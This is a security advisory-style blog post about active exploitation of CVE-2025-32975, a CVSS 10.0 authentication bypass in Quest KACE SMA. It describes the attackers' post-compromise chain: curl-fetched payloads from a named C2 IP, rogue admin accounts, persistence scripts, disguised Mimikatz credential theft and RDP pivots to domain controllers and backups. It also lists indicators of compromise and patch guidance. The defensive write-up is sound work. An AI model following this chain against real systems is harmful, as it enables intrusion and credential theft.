CVSS 10.0 Quest KACE SMA Bug Is Being Actively Exploited — Attackers Are Already at Your Domain Controllers

CybrPulse

CybrPulse

3 min read
CVSS 10.0 Quest KACE SMA Bug Is Being Actively Exploited — Attackers Are Already at Your Domain Controllers

title: "CVSS 10.0 Quest KACE SMA Bug Is Being Actively Exploited — Attackers Are Already at Your Domain Controllers"

slug: "cve-2025-32975-quest-kace-sma-active-exploitation"

tags: ["vulnerability", "active-exploitation", "endpoint-management", "ransomware", "cvss-10"]

A maximum-severity authentication bypass in Quest KACE Systems Management Appliance has moved from "patch when you can" to "patch right now or assume you're breached." Arctic Wolf started seeing active exploitation in customer environments the week of March 9, 2026. By the time attackers are done, they're sitting on your domain controllers and backup infrastructure.

Here's what's happening, and what you need to do about it.

The Vulnerability

CVE-2025-32975 is an authentication bypass in Quest KACE SMA's Single Sign-On handling. CVSS 10.0 — the maximum score. Unauthenticated attackers can impersonate legitimate users without valid credentials, which means complete administrative takeover of the appliance. No foothold required. No phishing. Just a network path to an exposed management interface.

Quest patched this in May 2025. That's ten months ago. Organizations running unpatched, internet-exposed instances are still getting hit today.

The affected version range covers most of the install base:

  • KACE SMA 13.x: patch to 13.0.385, 13.1.81, or 13.2.183
  • KACE SMA 14.x: apply Patch 5 (14.0.341) or Patch 4 (14.1.101)

What the Attackers Are Actually Doing

This isn't a smash-and-grab. The post-compromise behavior Arctic Wolf documented is pre-ransomware playbook, executed methodically.

After bypassing authentication, attackers use KACE's native `KPluginRunProcess` functionality to run remote commands — Base64-encoded payloads pulled via curl from their C2 server at `216.126.225[.]156`. They're using the appliance's own tooling against you, which makes detection harder.

Then they abuse `runkbot.exe` — a legitimate SMA background process — to create unauthorized admin accounts. Not a new binary dropped on disk. A trusted process, now creating rogue users. They add those accounts to local and domain administrator groups.

Persistence comes via two PowerShell scripts: `Enable-UpdateServices.ps1` and `taskband.ps1`, which modify registry settings to survive reboots. Again, native tooling, named to look like routine maintenance.

Once they're established, Mimikatz runs disguised as `asd.exe` to harvest plaintext credentials from memory. From there it's reconnaissance — `net time`, `net group`, logged-in user enumeration — before pivoting via RDP to wherever those credentials get them.

Where are they pivoting? Domain controllers. And backup infrastructure. Veeam. Veritas. Both reported by Arctic Wolf.

If you're wondering what comes next in that attack chain — it's ransomware, or data destruction, or both. Attackers don't bother hitting backup servers unless they're planning to make recovery painful.

Why This Keeps Happening

The patch was available for nearly a year. The gap between "Quest releases fix" (May 2025) and "Arctic Wolf sees active exploitation" (March 9, 2026) is almost exactly ten months. That's not an edge case timeline — that's standard enterprise patch lag for on-premises appliances that require change control windows, compatibility testing, and maintenance schedules.

KACE SMA manages endpoints across your organization. It handles software deployment, patch distribution, configuration management. It's trusted by design. An attacker who controls it controls what gets pushed to every managed endpoint. The blast radius isn't just the appliance — it's everything the appliance manages.

That's why attackers are targeting it. That's why the CVSS score is 10.0.

Indicators of Compromise

If you're running KACE SMA and want to know if you've already been hit, start here:

  • Outbound curl requests to `216.126.225[.]156` from the appliance
  • Unauthorized admin account creation via `runkbot.exe`
  • PowerShell scripts named `Enable-UpdateServices.ps1` or `taskband.ps1`
  • Presence of `asd.exe` (Mimikatz wrapper)
  • Unexpected `net time` and `net group` commands in logs
  • New RDP sessions to domain controllers or Veeam/Veritas hosts originating from the KACE SMA host

What to Do Right Now

If you haven't patched: Stop reading, open a maintenance window. Apply 13.0.385, 13.1.81, 13.2.183, 14.0.341 Patch 5, or 14.1.101 Patch 4 depending on your version. Then get the SMA management interface off the public internet — it should never be internet-exposed. Put it behind a VPN or restrict it to internal access only.

If you're already patched but internet-exposed: Still a problem. Patch doesn't retroactively remove your attack surface. Take it offline.

If you think you may have been compromised: Assume credential theft. Rotate passwords for all accounts with any access path through the KACE SMA. Audit admin group membership on your domain controllers. Hunt for the IOCs above. Engage your IR team now, not after you see ransomware notes.

The CybrPulse feed flagged this story at priority 8.8 — consistent with other CVSS 10.0 vulnerabilities we track under active exploitation. This is the kind of bug that ends up in breach disclosure filings three months from now. Don't let it be yours.

Read more